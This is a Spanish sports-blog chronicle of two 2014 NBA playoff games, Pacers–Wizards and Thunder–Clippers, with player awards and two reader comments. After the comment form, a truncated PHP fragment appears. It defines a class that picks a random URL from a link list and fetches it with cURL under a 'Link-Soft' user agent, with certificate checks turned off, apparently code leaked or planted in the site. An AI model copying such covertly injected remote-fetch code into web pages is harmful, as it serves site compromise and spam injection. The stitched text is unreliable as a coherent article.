La Crónica: Cuestión de actitud

08 de May de 2014 por Simon

Segunda jornada para las series en las que los visitantes lograron dar la sorpresa en la primera jornada y llevarse el partido a domicilio. Sin embargo, en esta ocasión los locales se arremangaron e igualaron las series.

Si titulamos nuestra crónica “cuestión de actitud” es porque Roy Hibbert ha demostrado que su problema es precisamente ese. Las noches que le apetece es capaz de dominar el juego en ambas zonas y convertirse en el factor que eleva a los Pacers a un nivel superior en el que son capaces de competir con cualquiera. Eso fue lo que sucedió ayer. Un inspiradísimo Hibbert fue el que catapultó a su equipo a la victoria en un partido durísimo y tosco a más no poder. Al enfrentamiento le faltó brillantez  pero la sustituyó con creces la competitividad y la igualdad del mismo. Hasta 8 veces cambió el partido de mando y 13 fueron las veces que estuvo el partido empatado. En los minutos finales tanto Wizards como Pacers tuvieron muchas oportunidades de llevarse el encuentro pero el desacierto de ambos mantuvo el marcador parado durante casi 3 minutos hasta que Lance Stephenson, a falta de 20 segundos para el final, logró una canasta que ponía a su equipo 5 arriba y que a la postre daba la reñida victoria a su equipo que mantiene la serie igualada (82-86). La eliminatorias ahora viaja a Washington donde se jugarán el tercer y cuarto asalto a partir del viernes.

El otro partido de la jornada era el que enfrentaba al recién nombrado MVP y sus Thunder contra Los Angeles Clippers. Al contrario que en el primer partido en el que los angelinos destrozaron a los locales, esta vez los Thunder lograron contener las embestidas rivales y fueron ellos los que protagonizaron un inicio de partido prodigioso que les permitió conseguir ventajas cercanas a la decena de puntos ya en el primer cuarto. En el segundo cuarto un par de triples casi seguidos de Paul metía a los Clippers de lleno en el encuentro y dejaban el partido abierto de cara a la segunda parte. La emoción duró poco porque desde bien iniciado el tercer cuarto  hizo su aparición momentánea pero estelar Thabo Sefolosha que con 12 puntos fue el apoyo que necesitaron Durant y Westbrook para sentenciar el partido. El último cuarto apenas tuvo interés pues el partido estaba ya finiquitado (101-112). 

PREMIOS

MVP: Faltó una asistencia de Kevin Durant (32p-12r-9a) para que él y Russell Westbrook (31-10-10) se convirtieran en la primera pareja de jugadores que logra cada uno un triple-doble en un partido de playoffs. Y después de lo que le hemos atizado es de justicia aplaudir el partidazo de Roy Hibbert (28p-9r-2t) que recuperó el nivel All-Star justo cuando más lo necesitaba Indiana.

Rookie: Steven Adams (6p-5r-1t en 17 min.) cumplió en los minutos que estuvo sobre la pista. Es lo máximo que se le puede pedir a un rookie en un partido de playoffs.

Sorpresa: JJ Redick (18p) mantiene el buen nivel que ha demostrado duranta la temporada cuando se lo han permitido las lesiones.

Decepción: Horrible partido de John Wall. Acabó con sólo 6 puntos tras anotar 2 de sus 13 lanzamientos pero lo más grave es que no tomó ni una buena decisición en los últimos minutos del encuentro. Paul George tampoco estuvo muy fino y se quedó en 11 puntos.

Esfuerzo en vano: Marcin Gortat se peleó con un renacido Hibbert pero aún así acabó con 21 puntos y 11 rebotes. Chris Paul fue el mejor de los Clippers con 17 puntos, 11 asistencias, 5 rebotes y 3 robos.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Vaya listo que es Adams,si trabaja algunos fundamentos y mantiene esa manera de jugar,tiene sitio en la competición por largo tiempo.Y no lo digo irónicamente.Raro ver a un rookie jugando a desequilibrar al rival.Bruce Bowen ya tiene heredero.

    Complicado limitar a Durant,toca cortar las penetraciones de Westbrook.Espero ver a un DeAndre Jordan atornillado en la zona y a un Blake Griffin más incisivo pese a la oposición de Ibaka para que se lleven los 2 de LA.

      Citar

  2. GreenPride dice:
    #2

    Bueno pues creo que Washington le ha perdonado la vida a los Pacers que jugando rematadamente mal siguen ahi enganchados a sus posibilidades. Esta vez toco partidazo de Hibbert y si quieren los Pacers tener alguna opción deberá dar más de estos. Sin embargo siguen atascados en ataque y sólo su defensa y las lamentables decisiones en ataque de Wall en los minutos finales les dieron la victoria. La serie sigue pintando mal para ellos pero la inexperiencia de los capitalinos les da opciones.
    En el Oeste puede que se esté gestando una gran serie entre OKC y los Clippers. Si en el primer encuentro CP3 dominó el tempo y mandó con sus puntos y dando balones a Griffin y a los demás esta vez Westbrook y Durant encontraron algo más de colaboración, sobre todo en la defensa de equipo lo que les permitió robar balones y matar a los Clippers al contragolpe. Los Thunder son el equipo más físico de la liga y si juegas contra ellos a correr no tienes opciones. Esta vez muy buen partido de Sefolosha que yo sigo pensando que debería ser suplente ya que normalmente con él y Perkins en cancha los Thunder juegan 3×5 en ataque y eso cierra mucho los espacios para sus dos figuras que están rayando a gran altura los dos. Serie divertida y muy interesante. Los de LA tienen un equipo mucho más profundo pero los Thunder son un rival muy peligroso con sus dos estrellas a pleno rendimiento. Veremos como va la cosa este fin de semana en Los Angeles.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>